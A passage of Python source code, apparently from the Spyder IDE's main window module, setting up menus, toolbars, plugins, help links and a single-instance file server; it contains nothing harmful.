from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.config.ipython import QTCONSOLE_INSTALLED
from spyder.py3compat import (getcwd, is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
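# Usage note: on Windows this returns a file URI to the PythonXXX.chm help file
# when present; elsewhere it points at the local HTML docs, or returns None.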
def get_focus_python_shell():
"""Extract and return Python shell from widget
Return None if *widget* is not a Python shell (e.g. IPython kernel)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import PythonShellWidget
from spyder.widgets.externalshell.pythonshell import ExternalPythonShell
if isinstance(widget, PythonShellWidget):
return widget
elif isinstance(widget, ExternalPythonShell):
return widget.shell
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
SPYDER_PATH = get_conf_path('path')
BOOKMARKS = (
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/",
_("PyQt4 Reference Guide")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/classes.html",
_("PyQt4 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.open_project
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Create our TEMPDIR
if not osp.isdir(programs.TEMPDIR):
os.mkdir(programs.TEMPDIR)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.extconsole = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
        # Tour  # TODO: should the tour be considered a plugin?
self.tour = None
self.tours_available = None
        # Check for updates Thread and Worker, references needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
from spyder.plugins.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, MainInterpreterConfigPage,
RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
# Set Window title and icon
if DEV is not None:
title = "Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = "Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += " [DEBUG MODE %d]" % DEBUG
if options.window_title is not None:
title += ' -- ' + options.window_title
self.base_title = title
self.update_window_title()
resample = os.name != 'nt'
icon = ima.icon('spyder', resample=resample)
# Resampling SVG icon only on non-Windows platforms (see Issue 1314):
self.setWindowIcon(icon)
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
        # The following flag remembers the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# Track which console plugin type had last focus
# True: Console plugin
# False: IPython console plugin
self.last_console_plugin_focus_was_python = True
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
"""Debug prints"""
debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
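    # A usage sketch (hypothetical values): create_toolbar(_("My toolbar"),
    # "my_toolbar", iconsize=32) returns the QToolBar and also registers it in
    # self.toolbarslist so the global show/hide logic can reach it.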
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, MENU_SEPARATOR,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
qteact = create_python_script_action(self,
_("Qt examples"), 'qt.png', "PyQt4",
osp.join("examples", "demos",
"qtdemo", "qtdemo"), args)
for act in (qtdact, qtlact, qteact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except (ImportError, AssertionError):
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except (ImportError, AssertionError):
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
fullpath_sorting = CONF.get('editor', 'fullpath_sorting', True)
self.outlineexplorer = OutlineExplorer(self,
fullpath_sorting=fullpath_sorting)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [None, restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# External console
self.set_splash(_("Loading external console..."))
from spyder.plugins.externalconsole import ExternalConsole
self.extconsole = ExternalConsole(self)
self.extconsole.register_plugin()
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# IPython console
if QTCONSOLE_INSTALLED:
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
self.set_splash(_("Setting up main window..."))
# Help menu
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
doc_path = get_module_data_path('spyder', relpath="doc",
attr_name='DOCPATH')
# * Trying to find the chm doc
spyder_doc = osp.join(doc_path, "Spyderdoc.chm")
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, os.pardir, "Spyderdoc.chm")
# * Trying to find the html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, "index.html")
# * Trying to find the development-version html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(get_module_source_path('spyder'),
os.pardir, 'build', 'lib', 'spyder',
'doc', "index.html")
# * If we totally fail, point to our web build
if not osp.isfile(spyder_doc):
spyder_doc = 'http://pythonhosted.org/spyder'
else:
spyder_doc = file_uri(spyder_doc)
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, self.tours_menu,
MENU_SEPARATOR, report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.ipyconsole is not None and self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
            if API != 'pyside':
                slot = lambda _checked, path=path: programs.start_file(path)
            else:
                slot = lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# Third-party plugins
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
#----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
except TypeError:
pass
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# Remove our temporary dir
atexit.register(self.remove_tmpdir)
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
        # On Mac OS X 10.7 the app is not displayed after initialization
        # (unclear why: this does not happen when it is started from the
        # terminal), so we resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if CONF.get('main', 'single_instance') and not self.new_instance:
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
            # Connect the window to the signal emitted by the previous server
            # when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
self.extconsole.setMinimumHeight(0)
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
        # Update lock status of dockwidgets (panes)
self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
self.apply_panes_settings()
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = []
if self.help is not None:
plugins_to_show.append(self.help)
